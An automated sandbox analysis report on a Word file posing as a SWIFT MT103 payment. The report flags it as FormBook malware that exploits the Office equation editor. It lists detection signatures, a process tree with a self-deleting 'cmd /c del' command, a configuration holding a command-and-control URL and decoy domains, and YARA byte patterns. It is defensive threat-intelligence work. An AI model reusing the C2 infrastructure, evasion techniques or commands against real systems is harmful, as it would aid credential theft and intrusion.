Play interactive tour

Edit tour

Analysis Report Swift_Payment.MT103.docx

Overview

General Information

Sample Name:	Swift_Payment.MT103.docx
Analysis ID:	433305
MD5:	b222a3ced51fbd79d5fb84bbca12e509
SHA1:	bc2f5c72b5e3ddd58e991d83c94cb071152a2671
SHA256:	3332ad1461dc79f815e43bf55a6e105bddef5324468b041a97457de7dfcaf2b4
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Contains an external reference to another document

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains method to dynamically call methods (often used by packers)

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Execution from Suspicious Folder

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2512 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2888 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2296 cmdline: 'C:\Users\Public\vbc.exe' MD5: 616A10FDC3307FD483916E1B578C9F9C)

vbc.exe (PID: 3040 cmdline: C:\Users\Public\vbc.exe MD5: 616A10FDC3307FD483916E1B578C9F9C)

explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

NAPSTAT.EXE (PID: 2244 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)

cmd.exe (PID: 2236 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rocketschool.net/nf2/"], "decoy": ["avlholisticdentalcare.com", "coolermassmedia.com", "anythingneverything.net", "maimaixiu.club", "veyconcorp.com", "rplelectro.com", "koch-mannes.club", "tecknetpro.com", "getresurface.net", "mertzengin.com", "nbppfanzgn.com", "508hill.com", "ourdailydelights.com", "aimeesambayan.com", "productstoredt.com", "doublelblonghorns.com", "lucidcurriculum.com", "thegoddessnow.com", "qywqmjku.icu", "yonibymina.com", "fair-employer.institute", "loundxgroup.com", "grandcanyonbean.com", "gmailanalytics.tools", "e-deers.tech", "gxbokee.com", "saimeisteel.com", "walnutcreekresidences.com", "catalinaislandlodging.com", "financassexy.com", "wtuydga.icu", "agrestorationil.com", "guidenconsultants.com", "annazon-pc.xyz", "trinamorris.com", "dealwiththeboss.com", "touchedbyastar.com", "myenduringlegacy.com", "livegirlroom.com", "managainstthegrain.com", "wikige.com", "muyiyang233.com", "dopegraphicz.com", "varietyarena.com", "henohenomohej.com", "wx323.com", "k1ck1td0wn.com", "fundsvalley.com", "ebike-ny.com", "xn--yedekparaclar-pgb62i.com", "vidssea.com", "wifiultraboostavis.com", "exploitconstruction.com", "freddeveld.com", "kslux.com", "couplealamo.icu", "touchwood-card.com", "k8vina51.com", "thrivwnt.com", "earlybirdwormfarm.com", "hayyaabaya.com", "holidayhomeinfrance.com", "ssalmeria.com", "nivxros.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x28ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x932a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5409:$sqlite3step: 68 34 1C 7B E1 0x551c:$sqlite3step: 68 34 1C 7B E1 0x5438:$sqlite3text: 68 38 2A 90 C5 0x555d:$sqlite3text: 68 38 2A 90 C5 0x544b:$sqlite3blob: 68 53 D8 7F 8C 0x5573:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xbe1f0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xbe46a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xc9f8d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xc9a79:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xca08f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xca207:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xbee82:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xc8cf4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbfb7b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xcfc2f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xd0c32:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xccd11:$sqlite3step: 68 34 1C 7B E1 0xcce24:$sqlite3step: 68 34 1C 7B E1 0xccd40:$sqlite3text: 68 38 2A 90 C5 0xcce65:$sqlite3text: 68 38 2A 90 C5 0xccd53:$sqlite3blob: 68 53 D8 7F 8C 0xcce7b:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1a9f18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1aa192:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1b5cb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1b57a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1b5db7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1b5f2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1aabaa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1b4a1c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ab8a3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1bb957:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bc95a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1b8a39:$sqlite3step: 68 34 1C 7B E1 0x1b8b4c:$sqlite3step: 68 34 1C 7B E1 0x1b8a68:$sqlite3text: 68 38 2A 90 C5 0x1b8b8d:$sqlite3text: 68 38 2A 90 C5 0x1b8a7b:$sqlite3blob: 68 53 D8 7F 8C 0x1b8ba3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: vbc.exe PID: 2296	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.vbc.exe.400000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.vbc.exe.400000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.vbc.exe.400000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
6.2.vbc.exe.400000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.vbc.exe.400000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.vbc.exe.400000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
6.0.vbc.exe.400000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.0.vbc.exe.400000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.0.vbc.exe.400000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
6.0.vbc.exe.400000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.0.vbc.exe.400000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.0.vbc.exe.400000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 7 entries

Sigma Overview

Exploits:

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2888, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2888, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2296

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\o[1].doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27720357.doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed

Found malware configuration

Show sources

Source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.rocketschool.net/nf2/"], "decoy": ["avlholisticdentalcare.com", "coolermassmedia.com", "anythingneverything.net", "maimaixiu.club", "veyconcorp.com", "rplelectro.com", "koch-mannes.club", "tecknetpro.com", "getresurface.net", "mertzengin.com", "nbppfanzgn.com", "508hill.com", "ourdailydelights.com", "aimeesambayan.com", "productstoredt.com", "doublelblonghorns.com", "lucidcurriculum.com", "thegoddessnow.com", "qywqmjku.icu", "yonibymina.com", "fair-employer.institute", "loundxgroup.com", "grandcanyonbean.com", "gmailanalytics.tools", "e-deers.tech", "gxbokee.com", "saimeisteel.com", "walnutcreekresidences.com", "catalinaislandlodging.com", "financassexy.com", "wtuydga.icu", "agrestorationil.com", "guidenconsultants.com", "annazon-pc.xyz", "trinamorris.com", "dealwiththeboss.com", "touchedbyastar.com", "myenduringlegacy.com", "livegirlroom.com", "managainstthegrain.com", "wikige.com", "muyiyang233.com", "dopegraphicz.com", "varietyarena.com", "henohenomohej.com", "wx323.com", "k1ck1td0wn.com", "fundsvalley.com", "ebike-ny.com", "xn--yedekparaclar-pgb62i.com", "vidssea.com", "wifiultraboostavis.com", "exploitconstruction.com", 